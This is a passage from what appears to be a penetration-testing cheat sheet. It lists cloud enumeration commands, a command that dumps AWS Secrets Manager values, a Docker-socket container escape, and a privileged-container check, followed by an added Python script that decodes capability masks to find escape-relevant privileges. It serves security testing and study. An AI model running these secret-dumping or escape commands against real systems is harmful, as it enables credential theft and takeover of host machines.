Tags: aws, iam, enumeration
Cloud - AWS Cloud

AWS EC2 Instance Enumeration

List EC2 instances in region

aws ec2 describe-instances --region us-east-1
Tags: aws, ec2, enumeration
Cloud - AWS Cloud

AWS Secrets Manager Dump

Enumerate and extract AWS secrets

aws secretsmanager list-secrets && aws secretsmanager get-secret-value --secret-id <secret-name>
Tags: aws, secrets, exfiltration
Cloud - Azure Cloud

Azure AD User Enumeration

List Azure AD users

az ad user list --query "[].userPrincipalName"
Tags: azure, ad, enumeration
Cloud - Azure Cloud

Azure Storage Account Enumeration

List storage accounts

az storage account list
Tags: azure, storage, enumeration
Container Escape Linux

Docker Socket Escape

Escape a container that has the host's docker.sock mounted: ask the daemon for a new container with the host root filesystem mounted and chroot into it. Needs a docker client inside the container; if the socket is not at /var/run/docker.sock, point the client at it with -H.

docker run -it --rm -v /:/host ubuntu chroot /host
Tags: docker, escape, privilege
Container Escape Linux

Check for Privileged Container

Print the effective capability mask of the current process. 00000000a80425fb is Docker's unprivileged default; a mask of 000001ffffffffff (0000003fffffffff on older kernels) means --privileged, and anything in between usually means --cap-add. capsh can decode the mask into names.

grep CapEff /proc/self/status
Tags: docker, capabilities, escape
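Added example (mine, not from the cheat sheet): a decoder for the CapEff mask above, so the hex value can be turned into capability names and checked for the ones that typically lead to an escape. The bit table follows linux/capability.h; the two reference masks are computed from that table (the Docker default set is the documented one) and the list of escape-relevant capabilities is my own selection.

```python
# Capability bit numbers from linux/capability.h (list index == bit).
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner", "cap_fsetid",
    "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap", "cap_linux_immutable",
    "cap_net_bind_service", "cap_net_broadcast", "cap_net_admin", "cap_net_raw",
    "cap_ipc_lock", "cap_ipc_owner", "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot",
    "cap_sys_ptrace", "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod", "cap_lease",
    "cap_audit_write", "cap_audit_control", "cap_setfcap", "cap_mac_override",
    "cap_mac_admin", "cap_syslog", "cap_wake_alarm", "cap_block_suspend", "cap_audit_read",
    "cap_perfmon", "cap_bpf", "cap_checkpoint_restore",
]

# Reference masks (constructed from the table above, not read from a live system).
DOCKER_DEFAULT_CAPEFF = "00000000a80425fb"   # Docker's default unprivileged capability set
PRIVILEGED_CAPEFF = "000001ffffffffff"       # all 41 capabilities, --privileged on a 5.9+ kernel

# Capabilities that routinely turn into a host escape or full host compromise (my selection).
ESCAPE_WORTHY = {"cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_sys_rawio",
                 "cap_dac_read_search", "cap_net_admin", "cap_bpf"}


def decode_capeff(hexmask):
    """Expand a CapEff hex mask into capability names, lowest bit first."""
    mask = int(hexmask.strip(), 16)
    names = []
    for bit in range(mask.bit_length()):
        if (mask >> bit) & 1:
            names.append(CAP_NAMES[bit] if bit < len(CAP_NAMES) else "cap_%d" % bit)
    return names


def read_capeff(status_path="/proc/self/status"):
    """The CapEff value of the current process, or None where /proc is not available."""
    try:
        with open(status_path) as fh:
            for line in fh:
                if line.startswith("CapEff:"):
                    return line.split()[1]
    except OSError:
        return None
    return None


def assess(hexmask):
    """Summarise a mask: the names, whether it looks like --privileged, and the escape-relevant caps."""
    caps = decode_capeff(hexmask)
    return {
        "caps": caps,
        # 38 caps is the full set on kernels before perfmon/bpf/checkpoint_restore were added
        "looks_privileged": "cap_sys_admin" in caps and len(caps) >= 38,
        "interesting": sorted(set(caps) & ESCAPE_WORTHY),
    }


if __name__ == "__main__":
    mask = read_capeff() or DOCKER_DEFAULT_CAPEFF
    print(mask, assess(mask))
```

Run it inside the container to replace the grep above; a non-empty "interesting" list is where to look next (cap_sys_admin plus a host mount namespace, cap_sys_ptrace with --pid=host, cap_dac_read_search against the host filesystem).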